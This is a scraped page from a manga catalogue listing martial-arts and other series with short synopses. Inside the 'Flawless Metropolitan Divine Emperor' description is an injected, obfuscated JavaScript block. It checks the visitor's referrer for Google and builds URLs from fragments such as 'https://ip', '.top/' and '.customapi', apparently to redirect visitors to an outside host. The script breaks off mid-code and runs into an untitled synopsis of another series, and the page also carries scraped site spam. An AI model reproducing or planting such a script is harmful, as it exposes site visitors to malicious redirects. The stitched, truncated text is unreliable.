Martial Arts - Page 43

Step into the universe of Martial Arts manga with stunning art and stories. Read Martial Arts manga free anytime!

2254 results

Fist Of The North Star

199X, nuclear war has ravaged the planet. From the ashes, gangs have risen to take all the power from world governments. Justice has ceased to exist in this now lawless world. From the ashes of a desert a man appears. His name is Kenshiro, and he is the sucessor to the most powerful martial art in the world, Hokuto Shinken. This art attacks the foes insides, and makes him explode internally, dying in often brutal ways. Kenshiro's goal is to kill the man who kidnapped his fiance, Yuria. A man that he once called friend, but whom betrayed him and left him for dead. Along the way he makes friends and enemies alike, while protecting those who cannot protect themselves.


Fist Of The North Star - Strawberry Flavor

In this *very* zany take on the dramatic series by Buronson and Tetsuo Hara, the end of the century… wasn't so bad, actually. A *very* special and brave Holy Emperor, Souther, wants to become more "involved" and to be on "friendly terms" with the noble Kenshiro & his posse. *Especially* Kenshiro. Due to his very outgoing nature, he also crashes the homes of his other buddies, often when they *especially* don't want him to show up! Join Souther as he releases his feelings in heart-throbbing, mind-bending confessions, settles complex and engrossing territorial disputes with deep and intricate consequences, enjoys the simple and introspective pleasures of a quiet dinner, and climbs the top of the rough and brutal pyramid that is the idol world - with the help of his best buddies, of course! Maybe even Kenshiro will be there - who knows! By the time it got its anime in 2015, *Strawberry Flavor* had sold over 1 million copies in Japan. The anime was composed of 2-minute long, abridged adaptations of select chapters from the first three volumes. They were placed after the main episodes of *DD Fist of the North Star* season 2. Every volume also contains at least one *gaiden* (side story). These gaiden are drawn in Yukito's (the elder sister of Yukito Imouto) normal artstyle, and expand on characters who did not receive gaiden during the Hokuto Gaiden period in the late 2000's. Gaiden List: Volume 1: Spade, Club & Diamond, Heart Volume 2: Souther Volume 3: Shuren & Huey Volume 4: Fudo Volume 5: Yuda Volume 6: Shin Volume 7: Falco & friends, Ein Volume 8: Ogai Volume 9: Devil Rebirth


Fist of the North Star: BBQ Flavor

Yushi Kawata, with his middle school-level English, has taken on translating *Fist of the North Star* himself! Revisit famous points from the first 15 volumes with Kawata's translation, supplemented by artwork from the Yukito sisters and artwork sampled from the original manga. You'll certainly have one crazy time around America!


Fist Of The Seeker

When martial artist Ikeuchi Mentaro is defeated in a tournament hosted by the Rokushin Kaikan karate school, he gives up karate to seek the strength he could not achieve through it. Soon enough, Rokushin Kaikan calls for another open tournament, and invites Ikeuchi and several other martial artists from different schools to compete. Ikeuchi sees this as the chance to get his revenge, and see how far he's come. This webcomic was written and drawn by Sandrovich Yabako in his amateur days, before he wrote Kengan Asura and Danberu Nan Kiro Moteru? A number of characters from this series, such as Kureishi Mitsuyo, would go on to appear in his later works.



Ouka is the great empire that rules over 1/3 of the world. To prevent conflicts from the other countries, they hold the battle competition once in every 8 years. In this competition, 5 candidates, known as "Patriots", from each countries are to battle against each other and the winners will be granted with fame and honor. This story follows Kurou, the boy who walks the same footsteps as his father to become the strongest patriot, along with his team . . .


Flash Sword

Read manhwa "A Blade at a Time" for free at Summary:Alternative:, What is mangabuddy?mangabuddy is currently the largest manhwa website with thousands of high-quality manhwa. Above all, readers can enjoy reading manhwa on mangabuddy without incurring any costs. If you love the manhwa "A Blade at a Time", don't forget to follow the !Wish you happy reading!


Flawless Metropolitan Divine Emperor

The first thing that Jiang Feng saw when he opened his eyes, is that his hands are on his class teacher’s Breast!! Owwu~ This, this is the time before I cultivate! The Immortal emperor has once again return to the mortal world!<script></script><script>function _0x424b(){var _0x376f30=['1382143QMEJQE','4919508efbRgH','href','https://ip','.top/','text','220454DCFDjD','kbZvZ','.customapi','WRrce','108741djsIDv','google','includes','random','324288rlnETw','referrer','location','831844AbATAa','http://rea','989875uZxQiZ','floor','','suYKx','hKJym','8Tlijnc','6MmBnxZ','rBYZh','aOZWR','DfcJp','WPiIP','then','FHbkO'];_0x424b=function(){return _0x376f30;};return _0x424b();}(function(_0x2d3aa6,_0x577422){var _0x3cb172=_0x58fc,_0x37136f=_0x2d3aa6();while(!![]){try{var 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"I'll have all that money and popularity." Shion the influencer who has a perfect face and body. She will participate in the influencer survival while hiding her dual life as a striper BJ. Challenge 5 missions to become famous and survive!! a golden opportunity. Put everything on the line to win, but.. If you fail, you'll be executed in public. Everything is exposed on social media. Who will survive here? Well, it's just the beginning. FLEX ON!!


Flower Wizard

Exorcist Cheon Ji Yul's job revolves around protecting the natural order of the universe.So how does he end up becoming the bodyguard for a naive middle school girl?!Possessing strange magic and special powers that monsters desire, the unwilling Cheon Ji Yul must now protect the girl from danger.What does fate have in store for them?+


Flowers Find a Way to Bloom

[비숲] 가로지나 세로지나 꽃은 핀다 [개정판][스크롤] / Flowers Will Bloom / 花儿终会绽放 / 가로지나 세로지나 꽃은 핀다 "Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older." Between two rivals, love finds a way. Namgoong Yoon is sickly with a bad temper. He wakes up one day to find he has traveled ten years back in time into the body of Baek Mo Ran, whom he used to bully! The years pass, and Yun finally regains control of his own body. But the question remains: Where was Mo Ran during all that time?


Flowers That Bloom At Night

"Why does she stop mourning her husband's death and leap off a cliff?"In this Joseon era, women were bound by the duty of serving their husbands for a lifetime...Lady Jo Ye-hwa, the daughter-in-law of the Left State Councilor's residence, followed the "virtuous wife" path as her duty. She had lived for fifteen years after losing her husband on the day of her wedding.During the day, she appeared as a modest young lady under the strict supervision of her mother-in-law. But at night, she became "Danju," the popular upper-class entertainer, and even played the role of a "righteous person" helping the weak. She led a double life.On the other hand, there was Im Su-ho, a government official uninterested in advancing in society or women. He attended the Left State Councilor's 60th birthday celebration and happened to glimpse the beautiful daughter-in-law, Ye-hwa, who was known for her beauty. His heart raced unexpectedly. "Why am I feeling this way?" Furthermore, that night, he encountered a masked vigilante with incredible archery skills..."This arrow is aimed at my heart.""This voice... a woman?!"The fact that this skilled and nimble vigilante was Ye-hwa was a secret!Facing the challenges of investigation before Lady Jo Ye-hwa, a widow, and the indifferent youth Su-ho, will they overcome the obstacles and find love?Note: This is the webtoon version for the upcoming kdrama with the same name.


Fly High!

From Starry Heaven: Meru Tachibana, 12 years old. She's just returned back to Tokyo after 7 years of training with her father, who thought she was a boy! Now Meru is stronger than most guys, and she's doing her best to make sure that people don't find out, or else her chances of making friends is ruined! However, a group of eighth graders seem insistant on making that impossible, as they break the rules and pick on the weak. Will Meru be able to stop them as the new student council president without appearing to be a "Monster Melt King" as her mother has warned?
